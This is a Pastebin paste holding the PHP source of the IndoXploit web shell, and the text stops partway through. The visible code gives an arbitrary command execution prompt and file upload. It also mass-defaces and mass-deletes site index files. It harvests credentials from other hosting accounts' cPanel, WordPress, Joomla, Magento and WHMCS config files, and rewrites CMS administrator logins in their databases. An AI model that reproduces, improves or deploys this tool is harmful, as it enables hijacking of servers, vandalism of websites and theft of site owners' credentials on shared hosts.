Guest User

Untitled

a guest
Dec 26th, 2018
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 74.52 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>IndoXploit</title>
  4. <meta name='author' content='IndoXploit'>
  5. <meta charset="UTF-8">
  6. <style type='text/css'>
  7. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  8. html {
  9. background: #000000;
  10. color: #ffffff;
  11. font-family: 'Ubuntu';
  12. font-size: 13px;
  13. width: 100%;
  14. }
  15. li {
  16. display: inline;
  17. margin: 5px;
  18. padding: 5px;
  19. }
  20. table, th, td {
  21. border-collapse:collapse;
  22. font-family: Tahoma, Geneva, sans-serif;
  23. background: transparent;
  24. font-family: 'Ubuntu';
  25. font-size: 13px;
  26. }
  27. .table_home, .th_home, .td_home {
  28. border: 1px solid #ffffff;
  29. }
  30. th {
  31. padding: 10px;
  32. }
  33. a {
  34. color: #ffffff;
  35. text-decoration: none;
  36. }
  37. a:hover {
  38. color: gold;
  39. text-decoration: underline;
  40. }
  41. b {
  42. color: gold;
  43. }
  44. input[type=text], input[type=password],input[type=submit] {
  45. background: transparent;
  46. color: #ffffff;
  47. border: 1px solid #ffffff;
  48. margin: 5px auto;
  49. padding-left: 5px;
  50. font-family: 'Ubuntu';
  51. font-size: 13px;
  52. }
  53. textarea {
  54. border: 1px solid #ffffff;
  55. width: 100%;
  56. height: 400px;
  57. padding-left: 5px;
  58. margin: 10px auto;
  59. resize: none;
  60. background: transparent;
  61. color: #ffffff;
  62. font-family: 'Ubuntu';
  63. font-size: 13px;
  64. }
  65. select {
  66. width: 152px;
  67. background: #000000;
  68. color: lime;
  69. border: 1px solid #ffffff;
  70. margin: 5px auto;
  71. padding-left: 5px;
  72. font-family: 'Ubuntu';
  73. font-size: 13px;
  74. }
  75. option:hover {
  76. background: lime;
  77. color: #000000;
  78. }
  79. </style>
  80. </head>
  81. <?php
  82. ###############################################################################
  83. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  84. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  85. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  86. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  87. // Greetz: All Member IndoXploit. & all my friends.
  88. ###############################################################################
  89. function w($dir,$perm) {
  90. if(!is_writable($dir)) {
  91. return "<font color=red>".$perm."</font>";
  92. } else {
  93. return "<font color=lime>".$perm."</font>";
  94. }
  95. }
  96. function r($dir,$perm) {
  97. if(!is_readable($dir)) {
  98. return "<font color=red>".$perm."</font>";
  99. } else {
  100. return "<font color=lime>".$perm."</font>";
  101. }
  102. }
  103. function exe($cmd) {
  104. if(function_exists('system')) {
  105. @ob_start();
  106. @system($cmd);
  107. $buff = @ob_get_contents();
  108. @ob_end_clean();
  109. return $buff;
  110. } elseif(function_exists('exec')) {
  111. @exec($cmd,$results);
  112. $buff = "";
  113. foreach($results as $result) {
  114. $buff .= $result;
  115. } return $buff;
  116. } elseif(function_exists('passthru')) {
  117. @ob_start();
  118. @passthru($cmd);
  119. $buff = @ob_get_contents();
  120. @ob_end_clean();
  121. return $buff;
  122. } elseif(function_exists('shell_exec')) {
  123. $buff = @shell_exec($cmd);
  124. return $buff;
  125. }
  126. }
  127. function perms($file){
  128. $perms = fileperms($file);
  129. if (($perms & 0xC000) == 0xC000) {
  130. // Socket
  131. $info = 's';
  132. } elseif (($perms & 0xA000) == 0xA000) {
  133. // Symbolic Link
  134. $info = 'l';
  135. } elseif (($perms & 0x8000) == 0x8000) {
  136. // Regular
  137. $info = '-';
  138. } elseif (($perms & 0x6000) == 0x6000) {
  139. // Block special
  140. $info = 'b';
  141. } elseif (($perms & 0x4000) == 0x4000) {
  142. // Directory
  143. $info = 'd';
  144. } elseif (($perms & 0x2000) == 0x2000) {
  145. // Character special
  146. $info = 'c';
  147. } elseif (($perms & 0x1000) == 0x1000) {
  148. // FIFO pipe
  149. $info = 'p';
  150. } else {
  151. // Unknown
  152. $info = 'u';
  153. }
  154. // Owner
  155. $info .= (($perms & 0x0100) ? 'r' : '-');
  156. $info .= (($perms & 0x0080) ? 'w' : '-');
  157. $info .= (($perms & 0x0040) ?
  158. (($perms & 0x0800) ? 's' : 'x' ) :
  159. (($perms & 0x0800) ? 'S' : '-'));
  160. // Group
  161. $info .= (($perms & 0x0020) ? 'r' : '-');
  162. $info .= (($perms & 0x0010) ? 'w' : '-');
  163. $info .= (($perms & 0x0008) ?
  164. (($perms & 0x0400) ? 's' : 'x' ) :
  165. (($perms & 0x0400) ? 'S' : '-'));
  166. // World
  167. $info .= (($perms & 0x0004) ? 'r' : '-');
  168. $info .= (($perms & 0x0002) ? 'w' : '-');
  169. $info .= (($perms & 0x0001) ?
  170. (($perms & 0x0200) ? 't' : 'x' ) :
  171. (($perms & 0x0200) ? 'T' : '-'));
  172. return $info;
  173. }
  174. function hdd($s) {
  175. if($s >= 1073741824)
  176. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  177. elseif($s >= 1048576)
  178. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  179. elseif($s >= 1024)
  180. return sprintf('%1.2f',$s / 1024 ) .' KB';
  181. else
  182. return $s .' B';
  183. }
  184. function ambilKata($param, $kata1, $kata2){
  185. if(strpos($param, $kata1) === FALSE) return FALSE;
  186. if(strpos($param, $kata2) === FALSE) return FALSE;
  187. $start = strpos($param, $kata1) + strlen($kata1);
  188. $end = strpos($param, $kata2, $start);
  189. $return = substr($param, $start, $end - $start);
  190. return $return;
  191. }
  192. if(get_magic_quotes_gpc()) {
  193. function idx_ss($array) {
  194. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  195. }
  196. $_POST = idx_ss($_POST);
  197. }
  198.  
  199. error_reporting(0);
  200. @ini_set('error_log',NULL);
  201. @ini_set('log_errors',0);
  202. @ini_set('max_execution_time',0);
  203. @set_time_limit(0);
  204. @set_magic_quotes_runtime(0);
  205. if(isset($_GET['dir'])) {
  206. $dir = $_GET['dir'];
  207. chdir($dir);
  208. } else {
  209. $dir = getcwd();
  210. }
  211. $dir = str_replace("\\","/",$dir);
  212. $scdir = explode("/", $dir);
  213. $freespace = hdd(disk_free_space("/"));
  214. $total = hdd(disk_total_space("/"));
  215. $used = $total - $freespace;
  216. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  217. $ds = @ini_get("disable_functions");
  218. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  219. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  220. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  221. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  222. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  223. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  224. if(!function_exists('posix_getegid')) {
  225. $user = @get_current_user();
  226. $uid = @getmyuid();
  227. $gid = @getmygid();
  228. $group = "?";
  229. } else {
  230. $uid = @posix_getpwuid(posix_geteuid());
  231. $gid = @posix_getgrgid(posix_getegid());
  232. $user = $uid['name'];
  233. $uid = $uid['uid'];
  234. $group = $gid['name'];
  235. $gid = $gid['gid'];
  236. }
  237. echo "System: <font color=lime>".php_uname()."</font><br>";
  238. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  239. echo "Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  240. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  241. echo "Safe Mode: $sm<br>";
  242. echo "Disable Functions: $show_ds<br>";
  243. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  244. echo "Current DIR: ";
  245. foreach($scdir as $c_dir => $cdir) {
  246. echo "<a href='?dir=";
  247. for($i = 0; $i <= $c_dir; $i++) {
  248. echo $scdir[$i];
  249. if($i != $c_dir) {
  250. echo "/";
  251. }
  252. }
  253. echo "'>$cdir</a>/";
  254. }
  255. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  256. echo "<hr>";
  257. echo "<center>";
  258. echo "<ul>";
  259. echo "<li>[ <a href='?'>Home</a> ]</li>";
  260. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  261. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  262. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  263. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  264. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  265. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  266. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  267. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  268. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  269. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  270. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  271. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  272. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  273. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  274. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  275. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  276. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  277. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  278. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  279. echo "</ul>";
  280. echo "</center>";
  281. echo "<hr>";
  282. if($_GET['do'] == 'upload') {
  283. echo "<center>";
  284. if($_POST['upload']) {
  285. if($_POST['tipe_upload'] == 'biasa') {
  286. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  287. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  288. } else {
  289. $act = "<font color=red>failed to upload file</font>";
  290. }
  291. } else {
  292. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  293. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  294. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  295. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  296. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  297. } else {
  298. $act = "<font color=red>failed to upload file</font>";
  299. }
  300. } else {
  301. $act = "<font color=red>failed to upload file</font>";
  302. }
  303. }
  304. }
  305. echo "Upload File:
  306. <form method='post' enctype='multipart/form-data'>
  307. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  308. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  309. <input type='file' name='ix_file'>
  310. <input type='submit' value='upload' name='upload'>
  311. </form>";
  312. echo $act;
  313. echo "</center>";
  314. } elseif($_GET['do'] == 'cmd') {
  315. echo "<form method='post'>
  316. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).": ~ $ </font>
  317. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  318. </form>";
  319. if($_POST['do_cmd']) {
  320. echo "<pre>".exe($_POST['cmd'])."</pre>";
  321. }
  322. } elseif($_GET['do'] == 'mass_deface') {
  323. function sabun_massal($dir,$namafile,$isi_script) {
  324. if(is_writable($dir)) {
  325. $dira = scandir($dir);
  326. foreach($dira as $dirb) {
  327. $dirc = "$dir/$dirb";
  328. $lokasi = $dirc.'/'.$namafile;
  329. if($dirb === '.') {
  330. file_put_contents($lokasi, $isi_script);
  331. } elseif($dirb === '..') {
  332. file_put_contents($lokasi, $isi_script);
  333. } else {
  334. if(is_dir($dirc)) {
  335. if(is_writable($dirc)) {
  336. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  337. file_put_contents($lokasi, $isi_script);
  338. $idx = sabun_massal($dirc,$namafile,$isi_script);
  339. }
  340. }
  341. }
  342. }
  343. }
  344. }
  345. function sabun_biasa($dir,$namafile,$isi_script) {
  346. if(is_writable($dir)) {
  347. $dira = scandir($dir);
  348. foreach($dira as $dirb) {
  349. $dirc = "$dir/$dirb";
  350. $lokasi = $dirc.'/'.$namafile;
  351. if($dirb === '.') {
  352. file_put_contents($lokasi, $isi_script);
  353. } elseif($dirb === '..') {
  354. file_put_contents($lokasi, $isi_script);
  355. } else {
  356. if(is_dir($dirc)) {
  357. if(is_writable($dirc)) {
  358. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  359. file_put_contents($lokasi, $isi_script);
  360. }
  361. }
  362. }
  363. }
  364. }
  365. }
  366. if($_POST['start']) {
  367. if($_POST['tipe_sabun'] == 'mahal') {
  368. echo "<div style='margin: 5px auto; padding: 5px'>";
  369. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  370. echo "</div>";
  371. } elseif($_POST['tipe_sabun'] == 'murah') {
  372. echo "<div style='margin: 5px auto; padding: 5px'>";
  373. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  374. echo "</div>";
  375. }
  376. } else {
  377. echo "<center>";
  378. echo "<form method='post'>
  379. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  380. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  381. <font style='text-decoration: underline;'>Folder:</font><br>
  382. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  383. <font style='text-decoration: underline;'>Filename:</font><br>
  384. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  385. <font style='text-decoration: underline;'>Index File:</font><br>
  386. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  387. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  388. </form></center>";
  389. }
  390. } elseif($_GET['do'] == 'mass_delete') {
  391. function hapus_massal($dir,$namafile) {
  392. if(is_writable($dir)) {
  393. $dira = scandir($dir);
  394. foreach($dira as $dirb) {
  395. $dirc = "$dir/$dirb";
  396. $lokasi = $dirc.'/'.$namafile;
  397. if($dirb === '.') {
  398. if(file_exists("$dir/$namafile")) {
  399. unlink("$dir/$namafile");
  400. }
  401. } elseif($dirb === '..') {
  402. if(file_exists("".dirname($dir)."/$namafile")) {
  403. unlink("".dirname($dir)."/$namafile");
  404. }
  405. } else {
  406. if(is_dir($dirc)) {
  407. if(is_writable($dirc)) {
  408. if(file_exists($lokasi)) {
  409. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  410. unlink($lokasi);
  411. $idx = hapus_massal($dirc,$namafile);
  412. }
  413. }
  414. }
  415. }
  416. }
  417. }
  418. }
  419. if($_POST['start']) {
  420. echo "<div style='margin: 5px auto; padding: 5px'>";
  421. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  422. echo "</div>";
  423. } else {
  424. echo "<center>";
  425. echo "<form method='post'>
  426. <font style='text-decoration: underline;'>Folder:</font><br>
  427. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  428. <font style='text-decoration: underline;'>Filename:</font><br>
  429. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  430. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  431. </form></center>";
  432. }
  433. } elseif($_GET['do'] == 'config') {
  434. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  435. $idx = mkdir("idx_config", 0777);
  436. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  437. $htc = fopen("idx_config/.htaccess","w");
  438. fwrite($htc, $isi_htc);
  439. while($passwd = fgets($etc)) {
  440. if($passwd == "" || !$etc) {
  441. echo "<font color=red>Can't read /etc/passwd</font>";
  442. } else {
  443. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  444. foreach($user_config[1] as $user_idx) {
  445. $user_config_dir = "/home/$user_idx/public_html/";
  446. if(is_readable($user_config_dir)) {
  447. $grab_config = array(
  448. "/home/$user_idx/.my.cnf" => "cpanel",
  449. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  450. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  451. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  452. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  453. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  454. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  455. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  456. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  457. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  458. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  459. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  460. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  461. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  462. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  463. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  464. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  465. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  466. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  467. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  468. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  469. foreach($grab_config as $config => $nama_config) {
  470. $ambil_config = file_get_contents($config);
  471. if($ambil_config == '') {
  472. } else {
  473. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  474. fputs($file_config,$ambil_config);
  475. }
  476. }
  477. }
  478. }
  479. }
  480. }
  481. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  482. } elseif($_GET['do'] == 'jumping') {
  483. $i = 0;
  484. echo "<pre><div class='margin: 5px auto;'>";
  485. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  486. while($passwd = fgets($etc)) {
  487. if($passwd == '' || !$etc) {
  488. echo "<font color=red>Can't read /etc/passwd</font>";
  489. } else {
  490. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  491. foreach($user_jumping[1] as $user_idx_jump) {
  492. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  493. if(is_readable($user_jumping_dir)) {
  494. $i++;
  495. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  496. if(is_writable($user_jumping_dir)) {
  497. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  498. }
  499. echo $jrw;
  500. if(function_exists('posix_getpwuid')) {
  501. $domain_jump = file_get_contents("/etc/named.conf");
  502. if($domain_jump == '') {
  503. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  504. } else {
  505. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  506. foreach($domains_jump[1] as $dj) {
  507. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  508. $user_jumping_url = $user_jumping_url['name'];
  509. if($user_jumping_url == $user_idx_jump) {
  510. echo " => ( <u>$dj</u> )<br>";
  511. break;
  512. }
  513. }
  514. }
  515. } else {
  516. echo "<br>";
  517. }
  518. }
  519. }
  520. }
  521. }
  522. if($i == 0) {
  523. } else {
  524. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  525. }
  526. echo "</div></pre>";
  527. } elseif($_GET['do'] == 'auto_edit_user') {
  528. if($_POST['hajar']) {
  529. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  530. echo "username atau password harus lebih dari 6 karakter";
  531. } else {
  532. $user_baru = $_POST['user_baru'];
  533. $pass_baru = md5($_POST['pass_baru']);
  534. $conf = $_POST['config_dir'];
  535. $scan_conf = scandir($conf);
  536. foreach($scan_conf as $file_conf) {
  537. if(!is_file("$conf/$file_conf")) continue;
  538. $config = file_get_contents("$conf/$file_conf");
  539. if(preg_match("/JConfig|joomla/",$config)) {
  540. $dbhost = ambilkata($config,"host = '","'");
  541. $dbuser = ambilkata($config,"user = '","'");
  542. $dbpass = ambilkata($config,"password = '","'");
  543. $dbname = ambilkata($config,"db = '","'");
  544. $dbprefix = ambilkata($config,"dbprefix = '","'");
  545. $prefix = $dbprefix."users";
  546. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  547. $db = mysql_select_db($dbname);
  548. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  549. $result = mysql_fetch_array($q);
  550. $id = $result['id'];
  551. $site = ambilkata($config,"sitename = '","'");
  552. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  553. echo "Config => ".$file_conf."<br>";
  554. echo "CMS => Joomla<br>";
  555. if($site == '') {
  556. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  557. } else {
  558. echo "Sitename => $site<br>";
  559. }
  560. if(!$update OR !$conn OR !$db) {
  561. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  562. } else {
  563. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  564. }
  565. mysql_close($conn);
  566. } elseif(preg_match("/WordPress/",$config)) {
  567. $dbhost = ambilkata($config,"DB_HOST', '","'");
  568. $dbuser = ambilkata($config,"DB_USER', '","'");
  569. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  570. $dbname = ambilkata($config,"DB_NAME', '","'");
  571. $dbprefix = ambilkata($config,"table_prefix = '","'");
  572. $prefix = $dbprefix."users";
  573. $option = $dbprefix."options";
  574. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  575. $db = mysql_select_db($dbname);
  576. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  577. $result = mysql_fetch_array($q);
  578. $id = $result[ID];
  579. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  580. $result2 = mysql_fetch_array($q2);
  581. $target = $result2[option_value];
  582. if($target == '') {
  583. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  584. } else {
  585. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  586. }
  587. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  588. echo "Config => ".$file_conf."<br>";
  589. echo "CMS => Wordpress<br>";
  590. echo $url_target;
  591. if(!$update OR !$conn OR !$db) {
  592. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  593. } else {
  594. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  595. }
  596. mysql_close($conn);
  597. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  598. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  599. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  600. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  601. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  602. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  603. $prefix = $dbprefix."admin_user";
  604. $option = $dbprefix."core_config_data";
  605. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  606. $db = mysql_select_db($dbname);
  607. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  608. $result = mysql_fetch_array($q);
  609. $id = $result[user_id];
  610. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  611. $result2 = mysql_fetch_array($q2);
  612. $target = $result2[value];
  613. if($target == '') {
  614. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  615. } else {
  616. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  617. }
  618. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  619. echo "Config => ".$file_conf."<br>";
  620. echo "CMS => Magento<br>";
  621. echo $url_target;
  622. if(!$update OR !$conn OR !$db) {
  623. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  624. } else {
  625. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  626. }
  627. mysql_close($conn);
  628. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  629. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  630. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  631. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  632. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  633. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  634. $prefix = $dbprefix."user";
  635. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  636. $db = mysql_select_db($dbname);
  637. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  638. $result = mysql_fetch_array($q);
  639. $id = $result[user_id];
  640. $target = ambilkata($config,"HTTP_SERVER', '","'");
  641. if($target == '') {
  642. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  643. } else {
  644. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  645. }
  646. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  647. echo "Config => ".$file_conf."<br>";
  648. echo "CMS => OpenCart<br>";
  649. echo $url_target;
  650. if(!$update OR !$conn OR !$db) {
  651. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  652. } else {
  653. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  654. }
  655. mysql_close($conn);
  656. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  657. $dbhost = ambilkata($config,'server = "','"');
  658. $dbuser = ambilkata($config,'username = "','"');
  659. $dbpass = ambilkata($config,'password = "','"');
  660. $dbname = ambilkata($config,'database = "','"');
  661. $prefix = "users";
  662. $option = "identitas";
  663. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  664. $db = mysql_select_db($dbname);
  665. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  666. $result = mysql_fetch_array($q);
  667. $target = $result[alamat_website];
  668. if($target == '') {
  669. $target2 = $result[url];
  670. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  671. if($target2 == '') {
  672. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  673. } else {
  674. $cek_login3 = file_get_contents("$target2/adminweb/");
  675. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  676. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  677. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  678. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  679. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  680. } else {
  681. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  682. }
  683. }
  684. } else {
  685. $cek_login = file_get_contents("$target/adminweb/");
  686. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  687. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  688. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  689. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  690. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  691. } else {
  692. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  693. }
  694. }
  695. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  696. echo "Config => ".$file_conf."<br>";
  697. echo "CMS => Lokomedia<br>";
  698. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  699. echo $url_target2;
  700. } else {
  701. echo $url_target;
  702. }
  703. if(!$update OR !$conn OR !$db) {
  704. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  705. } else {
